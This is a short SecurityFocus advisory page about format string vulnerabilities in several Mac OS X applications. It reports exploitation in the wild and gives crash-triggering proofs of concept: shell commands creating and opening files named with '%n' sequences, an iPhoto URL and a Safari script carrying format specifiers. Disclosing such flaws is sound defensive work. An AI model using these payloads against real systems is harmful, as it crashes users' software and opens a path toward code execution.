Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Apple Mac OS X Multiple Products Format String Vulnerabilities

Reports indicate that this issue is being exploited in the wild.

Proofs of concept that trigger crashes are available:

iMovie:
touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
open %n%n%n%n%n%n%n%n%n%n%n.imovieproj

Help Viewer:
touch %n%n%n%n%n%n%n%n%n%n%n.help
open %n%n%n%n%n%n%n%n%n%n%n.help

iPhoto:
open 'photo://%25n%25n%25n%25n%25n%25n'

Safari:
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>







 

Privacy Statement
Copyright 2008, SecurityFocus